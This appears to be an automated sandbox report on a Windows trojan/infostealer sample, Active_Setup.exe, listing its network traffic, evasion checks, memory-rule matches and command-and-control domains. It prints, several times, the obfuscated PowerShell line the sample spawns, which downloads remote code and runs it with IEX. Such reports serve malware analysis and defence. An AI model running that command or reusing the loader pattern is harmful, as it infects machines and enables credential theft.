Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XTI3RS82PT | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 568927 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 113 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00FB65A0 curl_easy_recv, GetProcAddress, VirtualAlloc | 0_2_00FB65A0
Source: global traffic | DNS traffic detected: DNS query: cryofficesj.click
Source: global traffic | DNS traffic detected: DNS query: cegu.shop
Source: global traffic | DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic | DNS traffic detected: DNS query: dfgh.online
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cryofficesj.click
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

System Summary

Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0098E879 NtCreateSection, NtMapViewOfSection, VirtualAlloc, NtMapViewOfSection, VirtualProtect, VirtualProtect, VirtualProtect, CreateThread | 0_2_0098E879
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FC57B0 appears 31 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FE9B40 appears 83 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 01081A00 appears 51 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00949636 appears 76 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00954F66 appears 77 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FC67B0 appears 37 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 0108B917 appears 33 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FE9BA0 appears 199 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FE8A10 appears 71 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 01083EF0 appears 714 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 01088438 appears 68 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FDDFF0 appears 286 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FF4C20 appears 47 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FF82E0 appears 38 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FDD1E0 appears 39 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FC1180 appears 123 times
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: String function: 00FC10F0 appears 133 times
Source: Active_Setup.exe | Static PE information: invalid certificate
Source: Active_Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/3@4/3
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00FC64B0 GetLastError,_strerror,_strncpy,FormatMessageA,curl_msnprintf,_strrchr,_strrchr,GetLastError,SetLastError
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_009409C9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\Active_Setup.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\EUDLOG_LOG_H_XXX_
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te23itw2.y2t.ps1
Source: Active_Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Active_Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Active_Setup.exe, 00000000.00000003.1790797946.0000000003A95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Active_Setup.exe | ReversingLabs: Detection: 18%
Source: Active_Setup.exe | String found in binary or memory: set-addPolicy
Source: Active_Setup.exe | String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\Active_Setup.exe | File read: C:\Users\user\Desktop\Active_Setup.exe
Source: unknown | Process created: C:\Users\user\Desktop\Active_Setup.exe "C:\Users\user\Desktop\Active_Setup.exe"
Source: C:\Users\user\Desktop\Active_Setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Active_Setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Active_Setup.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Active_Setup.exe | Static file information: File size 76054693 > 1048576
              Source: Active_Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Active_Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Active_Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Active_Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Active_Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Active_Setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Active_Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1940316473.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbes source: powershell.exe, 00000004.00000002.1944489969.00000000072B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\AWork\DRW15.8AB3\sharelib\EuDownloadPublicLibrary\x86\exe\EuDownload.pdb source: Active_Setup.exe
              Source: Active_Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Active_Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Active_Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Active_Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Active_Setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Users\user\Desktop\Active_Setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01052940 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary, | 0_2_01052940
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0108847D push ecx; ret | 0_2_01088490
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01086742 push ecx; ret | 0_2_01086755
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0096671D push 75205B8Dh; ret | 0_2_00966722
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00970908 push 1E00AF41h; retf | 0_2_0097090E
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0097CA46 push eax; mov dword ptr [esp], F7F4F5FAh | 0_2_0097CA54
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00983401 push cs; ret | 0_2_00983403
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0097F8B6 push eax; mov dword ptr [esp], 9AA5A4F7h | 0_2_0097F8B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_02E63AD2 push ebx; retf | 4_2_02E63ADA
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00FFDB50 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, | 0_2_00FFDB50
              Source: C:\Users\user\Desktop\Active_Setup.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\Active_Setup.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\Active_Setup.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Active_Setup.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep | graph_0-126147
              Source: C:\Users\user\Desktop\Active_Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Active_Setup.exe | System information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3798
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2329
              Source: C:\Users\user\Desktop\Active_Setup.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_0-126198
              Source: C:\Users\user\Desktop\Active_Setup.exe | API coverage: 4.7 %
              Source: C:\Users\user\Desktop\Active_Setup.exe TID: 7672 | Thread sleep time: -210000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028 | Thread sleep count: 3798 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024 | Thread sleep count: 2329 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\Active_Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01084079 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, | 0_2_01084079
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01083B05 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, | 0_2_01083B05
              Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
              Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\Comms
              Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\Packages
              Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local
              Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\Mozilla
              Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
              Source: Active_Setup.exe, 00000000.00000003.1928822586.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1934051476.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
              Source: Active_Setup.exe, 00000000.00000002.1934051476.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1944489969.000000000727B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
              Source: C:\Users\user\Desktop\Active_Setup.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0107F1F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_0107F1F2
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01052940 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary, | 0_2_01052940
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_009402B9 mov edx, dword ptr fs:[00000030h] | 0_2_009402B9
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00940879 mov eax, dword ptr fs:[00000030h] | 0_2_00940879
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00940C29 mov eax, dword ptr fs:[00000030h] | 0_2_00940C29
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00940EC8 mov eax, dword ptr fs:[00000030h] | 0_2_00940EC8
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_00940EC9 mov eax, dword ptr fs:[00000030h] | 0_2_00940EC9
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_010902E0 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, | 0_2_010902E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0108600F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0108600F
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0108C74F SetUnhandledExceptionFilter, | 0_2_0108C74F
              Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_0107F541 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_0107F541

              HIPS / PFW / Operating System Protection Evasion

              Source: Active_Setup.exe | String found in binary or memory: rabidcowse.shop
              Source: Active_Setup.exe | String found in binary or memory: cloudewahsj.shop
              Source: Active_Setup.exe | String found in binary or memory: tirepublicerj.shop
              Source: Active_Setup.exe | String found in binary or memory: noisycuttej.shop
              Source: Active_Setup.exe | String found in binary or memory: wholersorie.shop
              Source: Active_Setup.exe | String found in binary or memory: framekgirus.shop
              Source: Active_Setup.exe | String found in binary or memory: nearycrepso.shop
              Source: Active_Setup.exe | String found in binary or memory: abruptyopsn.shop
              Source: Active_Setup.exe | String found in binary or memory: cryofficesj.click
              Source: C:\Users\user\Desktop\Active_Setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ;
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_01092233
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: GetLocaleInfoA,0_2_010962C8
Source: C:\Users\user\Desktop\Active_Setup.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_010928A1
